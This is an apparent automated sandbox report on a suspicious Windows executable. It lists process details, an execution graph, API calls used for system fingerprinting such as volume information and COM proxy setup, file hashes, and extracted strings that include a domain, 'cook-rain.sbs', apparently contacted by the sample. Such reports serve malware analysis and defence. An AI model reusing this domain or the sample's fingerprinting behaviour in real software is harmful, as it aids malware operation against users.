                                        Date: Thu, 21 Nov 2024 18:57:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: PHPSESSID=6212j4miqd8j8e1m5h89sm4s8h; expires=Mon, 17-Mar-2025 12:43:40 GMT; Max-Age=9999999; path=/
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        cf-cache-status: DYNAMIC
                                        vary: accept-encoding
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z42g0xRxOVb0lrLHCs7qwAO7KgW73TXIlZTtJPo6qVedj6MQOAntpC4po%2FpRszhrGnfwjeNiYSePXuVPvkTUwejMmz6P4IbEQcwGNXnsjhKFhthDyz5FiULpmzU6viZU"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8e62e72f7f8b4240-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=904&delivery_rate=1668571&cwnd=242&unsent_bytes=0&cid=be0829dcb286f22e&ts=763&x=0"
                                        2024-11-21 18:57:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                        Data Ascii: 2ok
                                        2024-11-21 18:57:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:13:56:57
                                        Start date:21/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x950000
                                        File size:1'858'048 bytes
                                        MD5 hash:6380B8CA2F9BFC1D86617A3A7FD924F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:3.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:66.4%
                                          Total number of Nodes:235
                                          Total number of Limit Nodes:14
                                          execution_graph 6879 95e970 6880 95e8b8 6879->6880 6882 95e948 6880->6882 6883 98df70 LdrInitializeThunk 6880->6883 6882->6882 6883->6882 6640 95ceb3 CoInitializeSecurity 6641 95d7d3 CoUninitialize 6642 95d7da 6641->6642 6871 95dc33 6873 95dcd0 6871->6873 6872 95dd4e 6873->6872 6875 98df70 LdrInitializeThunk 6873->6875 6875->6872 6876 969130 6877 98b8e0 2 API calls 6876->6877 6878 969158 6877->6878 6920 96db30 6921 96db70 6920->6921 6921->6921 6922 95b210 RtlAllocateHeap 6921->6922 6923 96dda8 6922->6923 6691 95e0d8 6692 95e100 6691->6692 6694 95e16e 6692->6694 6707 98df70 LdrInitializeThunk 6692->6707 6696 95e22e 6694->6696 6708 98df70 LdrInitializeThunk 6694->6708 6709 975e90 6696->6709 6698 95e29d 6717 976190 6698->6717 6700 95e2bd 6727 977e20 6700->6727 6704 95e2e6 6747 978c90 6704->6747 6706 95e2ef 6707->6694 6708->6696 6710 975f30 6709->6710 6710->6710 6711 976026 6710->6711 6713 9760b5 6710->6713 6716 976020 6710->6716 6756 990f60 6710->6756 6750 971790 6711->6750 6714 971790 2 API calls 6713->6714 6714->6716 6716->6698 6718 97619e 6717->6718 6789 990b70 6718->6789 6720 990f60 2 API calls 6723 975fe0 6720->6723 6721 976026 6726 971790 2 API calls 6721->6726 6722 9760b5 6725 971790 2 API calls 6722->6725 6723->6720 6723->6721 6723->6722 6724 976020 6723->6724 6724->6700 6725->6724 6726->6722 6728 9780a0 6727->6728 6731 977e4c 6727->6731 6733 9780d7 6727->6733 6737 95e2dd 6727->6737 6794 98ded0 6728->6794 6729 990f60 2 API calls 6729->6731 6731->6728 6731->6729 6732 990b70 LdrInitializeThunk 6731->6732 6731->6733 6731->6737 6732->6731 6734 990b70 LdrInitializeThunk 6733->6734 6733->6737 6738 98df70 LdrInitializeThunk 6733->6738 6798 990c80 6733->6798 6806 991580 6733->6806 6734->6733 6739 978770 6737->6739 6738->6733 6740 9787a0 6739->6740 6743 97882e 6740->6743 6818 98df70 LdrInitializeThunk 6740->6818 6742 98b7e0 RtlAllocateHeap 6744 9788b1 6742->6744 6743->6742 6746 97895e 6743->6746 6744->6746 6819 98df70 LdrInitializeThunk 6744->6819 6746->6704 6820 978cb0 6747->6820 6749 978c99 6749->6706 6755 9717a0 6750->6755 6752 97183e 6752->6713 6753 971861 6753->6752 6768 973d70 6753->6768 6755->6752 6755->6753 6764 990610 6755->6764 6758 990f90 6756->6758 6757 990fde 6759 98b7e0 RtlAllocateHeap 6757->6759 6763 9910ae 6757->6763 6758->6757 6787 98df70 LdrInitializeThunk 6758->6787 6761 99101f 6759->6761 6761->6763 6788 98df70 LdrInitializeThunk 6761->6788 6763->6710 6765 990630 6764->6765 6765->6765 6766 99075e 6765->6766 6780 98df70 LdrInitializeThunk 6765->6780 6766->6753 6769 990480 LdrInitializeThunk 6768->6769 6771 973db0 6769->6771 6770 9744c3 6770->6752 6771->6770 6781 98b7e0 6771->6781 6774 973dee 6775 973e7c 6774->6775 6784 98df70 LdrInitializeThunk 6774->6784 6776 98b7e0 RtlAllocateHeap 6775->6776 6777 974427 6775->6777 6785 98df70 LdrInitializeThunk 6775->6785 6776->6775 6777->6770 6786 98df70 LdrInitializeThunk 6777->6786 6780->6766 6782 98b800 6781->6782 6782->6782 6783 98b83f RtlAllocateHeap 6782->6783 6783->6774 6784->6774 6785->6775 6786->6777 6787->6757 6788->6763 6791 990b90 6789->6791 6790 990c4f 6790->6723 6791->6790 6793 98df70 LdrInitializeThunk 6791->6793 6793->6790 6795 98df3e 6794->6795 6797 98deea 6794->6797 6796 98b7e0 RtlAllocateHeap 6795->6796 6796->6797 6797->6733 6799 990cb0 6798->6799 6800 990cfe 6799->6800 6814 98df70 LdrInitializeThunk 6799->6814 6802 98b7e0 RtlAllocateHeap 6800->6802 6805 990e0f 6800->6805 6803 990d8b 6802->6803 6803->6805 6815 98df70 LdrInitializeThunk 6803->6815 6805->6733 6805->6805 6807 991591 6806->6807 6808 99163e 6807->6808 6816 98df70 LdrInitializeThunk 6807->6816 6810 98b7e0 RtlAllocateHeap 6808->6810 6813 9917de 6808->6813 6811 9916ae 6810->6811 6811->6813 6817 98df70 LdrInitializeThunk 6811->6817 6813->6733 6814->6800 6815->6805 6816->6808 6817->6813 6818->6743 6819->6746 6821 978d10 6820->6821 6821->6821 6830 98b8e0 6821->6830 6823 978d6d 6823->6749 6825 978d45 6825->6823 6828 978e66 6825->6828 6838 98bb20 6825->6838 6842 98c040 6825->6842 6829 978ece 6828->6829 6850 98bfa0 6828->6850 6829->6749 6831 98b900 6830->6831 6832 98b93e 6831->6832 6854 98df70 LdrInitializeThunk 6831->6854 6834 98b7e0 RtlAllocateHeap 6832->6834 6837 98ba1f 6832->6837 6835 98b9c5 6834->6835 6835->6837 6855 98df70 LdrInitializeThunk 6835->6855 6837->6825 6839 98bbce 6838->6839 6840 98bb31 6838->6840 6839->6825 6840->6839 6856 98df70 LdrInitializeThunk 6840->6856 6843 98c090 6842->6843 6849 98c0d8 6843->6849 6857 98df70 LdrInitializeThunk 6843->6857 6845 98c6cf 6846 98c73e 6845->6846 6858 98df70 LdrInitializeThunk 6845->6858 6846->6825 6848 98df70 LdrInitializeThunk 6848->6849 6849->6845 6849->6846 6849->6848 6849->6849 6852 98bfc0 6850->6852 6851 98c00e 6851->6828 6852->6851 6859 98df70 LdrInitializeThunk 6852->6859 6854->6832 6855->6837 6856->6839 6857->6849 6858->6846 6859->6851 6610 95cf05 6611 95cf20 6610->6611 6616 989030 6611->6616 6613 95cf7a 6614 989030 5 API calls 6613->6614 6615 95d3ca 6614->6615 6617 989090 6616->6617 6617->6617 6618 9891b1 SysAllocString 6617->6618 6622 98966a 6617->6622 6620 9891df 6618->6620 6619 98969c GetVolumeInformationW 6625 9896ba 6619->6625 6621 9891ea CoSetProxyBlanket 6620->6621 6620->6622 6621->6622 6623 98920a 6621->6623 6622->6619 6624 989658 SysFreeString SysFreeString 6623->6624 6624->6622 6625->6613 6625->6625 6894 95a2e1 6895 95a3d0 6894->6895 6895->6895 6898 95b210 6895->6898 6897 95a3fe 6901 95b2a0 6898->6901 6899 98ded0 RtlAllocateHeap 6899->6901 6900 95b2d6 6900->6897 6900->6900 6901->6899 6901->6900 6626 9589a0 6628 9589af 6626->6628 6627 958cb3 ExitProcess 6628->6627 6629 958cae 6628->6629 6634 95ce80 CoInitializeEx 6628->6634 6635 98deb0 6629->6635 6638 98f460 6635->6638 6637 98deb5 FreeLibrary 6637->6627 6639 98f469 6638->6639 6639->6637 6643 971960 6644 9719d8 6643->6644 6649 969530 6644->6649 6646 971a84 6647 969530 LdrInitializeThunk 6646->6647 6648 971b29 6647->6648 6650 969560 6649->6650 6650->6650 6661 990480 6650->6661 6652 96974b 6671 9907b0 6652->6671 6653 969756 6658 969783 6653->6658 6660 9696ca 6653->6660 6665 990880 6653->6665 6654 96962e 6654->6652 6654->6653 6655 990480 LdrInitializeThunk 6654->6655 6654->6658 6654->6660 6655->6654 6658->6660 6675 98df70 LdrInitializeThunk 6658->6675 6660->6646 6660->6660 6662 9904a0 6661->6662 6663 9905be 6662->6663 6676 98df70 LdrInitializeThunk 6662->6676 6663->6654 6666 9908b0 6665->6666 6666->6666 6669 9908fe 6666->6669 6677 98df70 LdrInitializeThunk 6666->6677 6668 9909ae 6668->6658 6669->6668 6678 98df70 LdrInitializeThunk 6669->6678 6673 9907e0 6671->6673 6672 99082e 6672->6653 6673->6672 6679 98df70 LdrInitializeThunk 6673->6679 6675->6660 6676->6663 6677->6669 6678->6668 6679->6672 6680 98b7e0 6681 98b800 6680->6681 6681->6681 6682 98b83f RtlAllocateHeap 6681->6682 6860 98bce0 6861 98bd5a 6860->6861 6862 98bcf2 6860->6862 6862->6861 6864 98bd52 6862->6864 6868 98df70 LdrInitializeThunk 6862->6868 6863 98bede 6863->6861 6870 98df70 LdrInitializeThunk 6863->6870 6864->6863 6864->6864 6869 98df70 LdrInitializeThunk 6864->6869 6868->6864 6869->6863 6870->6861 6884 9902c0 6885 9902e0 6884->6885 6886 99041e 6885->6886 6888 98df70 LdrInitializeThunk 6885->6888 6888->6886 6907 990a00 6909 990a30 6907->6909 6908 990b2e 6911 990a7e 6909->6911 6913 98df70 LdrInitializeThunk 6909->6913 6911->6908 6914 98df70 LdrInitializeThunk 6911->6914 6913->6911 6914->6908 6683 95e88f 6684 95e88e 6683->6684 6684->6683 6686 95e89c 6684->6686 6689 98df70 LdrInitializeThunk 6684->6689 6688 95e948 6686->6688 6690 98df70 LdrInitializeThunk 6686->6690 6689->6686 6690->6688 6924 95c32b 6925 98ded0 RtlAllocateHeap 6924->6925 6926 95c338 6925->6926

                                          Executed Functions

                                          Function 00989030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 989030-989089 1 989090-9890c6 0->1 1->1 2 9890c8-9890e4 1->2 4 9890f1-98913f 2->4 5 9890e6 2->5 7 98968c-9896b8 call 98f9a0 GetVolumeInformationW 4->7 8 989145-989177 4->8 5->4 13 9896ba 7->13 14 9896bc-9896df call 970650 7->14 9 989180-9891af 8->9 9->9 11 9891b1-9891e4 SysAllocString 9->11 17 9891ea-989204 CoSetProxyBlanket 11->17 18 989674-989688 11->18 13->14 20 9896e0-9896e8 14->20 21 98966a-989670 17->21 22 98920a-989225 17->22 18->7 20->20 23 9896ea-9896ec 20->23 21->18 25 989230-989262 22->25 26 9896fe-98972d call 970650 23->26 27 9896ee-9896fb call 958330 23->27 25->25 28 989264-9892df 25->28 35 989730-989738 26->35 27->26 36 9892e0-98930b 28->36 35->35 37 98973a-98973c 35->37 36->36 38 98930d-98933d 36->38 39 98974e-98977d call 970650 37->39 40 98973e-98974b call 958330 37->40 49 989658-989668 SysFreeString * 2 38->49 50 989343-989365 38->50 46 989780-989788 39->46 40->39 46->46 48 98978a-98978c 46->48 51 98979e-9897cb call 970650 48->51 52 98978e-98979b call 958330 48->52 49->21 57 98964b-989655 50->57 58 98936b-98936e 50->58 61 9897d0-9897d8 51->61 52->51 57->49 58->57 60 989374-989379 58->60 60->57 63 98937f-9893cf 60->63 61->61 64 9897da-9897dc 61->64 69 9893d0-989416 63->69 65 9897ee-9897f5 64->65 66 9897de-9897eb call 958330 64->66 66->65 69->69 71 989418-98942d 69->71 72 989431-989433 71->72 73 989439-98943f 72->73 74 989636-989647 72->74 73->74 75 989445-989452 73->75 74->57 76 98948d 75->76 77 989454-989459 75->77 80 98948f-9894b7 call 9582b0 76->80 79 98946c-989470 77->79 81 989460 79->81 82 989472-98947b 79->82 90 9895e8-9895f9 80->90 91 9894bd-9894cb 80->91 85 989461-98946a 81->85 86 98947d-989480 82->86 87 989482-989486 82->87 85->79 85->80 86->85 87->85 89 989488-98948b 87->89 89->85 92 9895fb 90->92 93 989600-98960c 90->93 91->90 94 9894d1-9894d5 91->94 92->93 95 98960e 93->95 96 989613-989633 call 9582e0 call 9582c0 93->96 97 9894e0-9894ea 94->97 95->96 96->74 98 9894ec-9894f1 97->98 99 989500-989506 97->99 101 989590-989596 98->101 102 989508-98950b 99->102 103 989525-989533 99->103 109 989598-98959e 101->109 102->103 105 98950d-989523 102->105 106 9895aa-9895b3 103->106 107 989535-989538 103->107 105->101 113 9895b9-9895bc 106->113 114 9895b5-9895b7 106->114 107->106 110 98953a-989581 107->110 109->90 112 9895a0-9895a2 109->112 110->101 112->97 115 9895a8 112->115 116 9895be-9895e2 113->116 117 9895e4-9895e6 113->117 114->109 115->90 116->101 117->101
                                          APIs
                                          • SysAllocString.OLEAUT32(13C511C2), ref: 009891B6
                                          • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009891FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: AllocBlanketProxyString
                                          • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                          • API String ID: 900851650-4011188741
                                          • Opcode ID: a6b98b1d6c8312d99b35506abcad0b717ba1e4b2854cf9503a1730447a7874c8
                                          • Instruction ID: b7225ecd7e9b8aecc7751ce978986d6c2b91c20084d0e94a85bca4df61257dec
                                          • Opcode Fuzzy Hash: a6b98b1d6c8312d99b35506abcad0b717ba1e4b2854cf9503a1730447a7874c8
                                          • Instruction Fuzzy Hash: 35224371A083019BE720DF24C881B6BBBAAEFD5354F188A1CF4959B3D1E774D905CB92
                                          Function 0095CF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 118 95cf05-95cf12 119 95cf20-95cf5c 118->119 119->119 120 95cf5e-95cfa5 call 958930 call 989030 119->120 125 95cfb0-95cffc 120->125 125->125 126 95cffe-95d06b 125->126 127 95d070-95d097 126->127 127->127 128 95d099-95d0aa 127->128 129 95d0ac-95d0b3 128->129 130 95d0cb-95d0d3 128->130 133 95d0c0-95d0c9 129->133 131 95d0d5-95d0d6 130->131 132 95d0eb-95d0f8 130->132 134 95d0e0-95d0e9 131->134 135 95d11b-95d123 132->135 136 95d0fa-95d101 132->136 133->130 133->133 134->132 134->134 138 95d125-95d126 135->138 139 95d13b-95d266 135->139 137 95d110-95d119 136->137 137->135 137->137 140 95d130-95d139 138->140 141 95d270-95d2ce 139->141 140->139 140->140 141->141 142 95d2d0-95d2ff 141->142 143 95d300-95d31a 142->143 143->143 144 95d31c-95d36b call 95b960 143->144 147 95d370-95d3ac 144->147 147->147 148 95d3ae-95d3c5 call 958930 call 989030 147->148 152 95d3ca-95d3eb 148->152 153 95d3f0-95d43c 152->153 153->153 154 95d43e-95d4ab 153->154 155 95d4b0-95d4d7 154->155 155->155 156 95d4d9-95d4ea 155->156 157 95d4ec-95d4ef 156->157 158 95d4fb-95d503 156->158 159 95d4f0-95d4f9 157->159 160 95d505-95d506 158->160 161 95d51b-95d528 158->161 159->158 159->159 164 95d510-95d519 160->164 162 95d54b-95d557 161->162 163 95d52a-95d531 161->163 166 95d559-95d55a 162->166 167 95d56b-95d696 162->167 165 95d540-95d549 163->165 164->161 164->164 165->162 165->165 168 95d560-95d569 166->168 169 95d6a0-95d6fe 167->169 168->167 168->168 169->169 170 95d700-95d72f 169->170 171 95d730-95d74a 170->171 171->171 172 95d74c-95d791 call 95b960 171->172
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$BB9321930CE9E017D7CBBD6DF28D3732$N3F5$S7HI$cook-rain.sbs$y?O1$c]e$gy
                                          • API String ID: 0-1599543296
                                          • Opcode ID: 718a20c28cfcb5a3d20f2348899575fa332d72d313ea24fd5cbe85065cabbc17
                                          • Instruction ID: c5054a9911fb2e97f886042b8fea6ca52843a01d33bbe3cdc54d1fa7286310e4
                                          • Opcode Fuzzy Hash: 718a20c28cfcb5a3d20f2348899575fa332d72d313ea24fd5cbe85065cabbc17
                                          • Instruction Fuzzy Hash: 02120CB154D3C18ED335CF2AC495BEFBBA1ABD2304F18895CC8DA5B256C774094ACB92
                                          Function 009589A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 203 9589a0-9589b1 call 98cb70 206 9589b7-9589cf call 986620 203->206 207 958cb3-958cbb ExitProcess 203->207 211 9589d5-9589fb 206->211 212 958cae call 98deb0 206->212 216 958a01-958bda 211->216 217 9589fd-9589ff 211->217 212->207 219 958be0-958c50 216->219 220 958c8a-958ca2 call 959ed0 216->220 217->216 222 958c56-958c88 219->222 223 958c52-958c54 219->223 220->212 225 958ca4 call 95ce80 220->225 222->220 223->222 227 958ca9 call 95b930 225->227 227->212
                                          APIs
                                          • ExitProcess.KERNEL32(00000000), ref: 00958CB6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 38a6888df78534d59b20b62120d7dbe5dac6a74758a5ffec945458337a74d00d
                                          • Instruction ID: f1a887cbecdf653e51e5089ef146e8e5bd508895d1f1ae36e695739223c04e83
                                          • Opcode Fuzzy Hash: 38a6888df78534d59b20b62120d7dbe5dac6a74758a5ffec945458337a74d00d
                                          • Instruction Fuzzy Hash: F571F473B547044BC708DEAAD89235BF6D6ABC8714F09D83D6888D7391EEB89C054785
                                          Function 0098DF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 98df70-98dfa2 LdrInitializeThunk
                                          APIs
                                          • LdrInitializeThunk.NTDLL(0098BA46,?,00000010,00000005,00000000,?,00000000,?,?,00969158,?,?,009619B4), ref: 0098DF9E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                          Function 0098B7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 229 98b7e0-98b7ff 230 98b800-98b83d 229->230 230->230 231 98b83f-98b85b RtlAllocateHeap 230->231
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0098B84E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 78c5974dfdac06fd98d05769deca1ffe2324ccd30f39db8dda8e8bdb8c770492
                                          • Instruction ID: 8b26079160f7d8c7e70530c306d9377b2475fb941596ce430de1b290688f832b
                                          • Opcode Fuzzy Hash: 78c5974dfdac06fd98d05769deca1ffe2324ccd30f39db8dda8e8bdb8c770492
                                          • Instruction Fuzzy Hash: EB017633A557180BC300AE7CDC9464ABB96EFD9224F2A063CE5D4873D0DA31990A8395
                                          Function 0095CE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 232 95ce80-95ceb0 CoInitializeEx
                                          APIs
                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0095CE94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
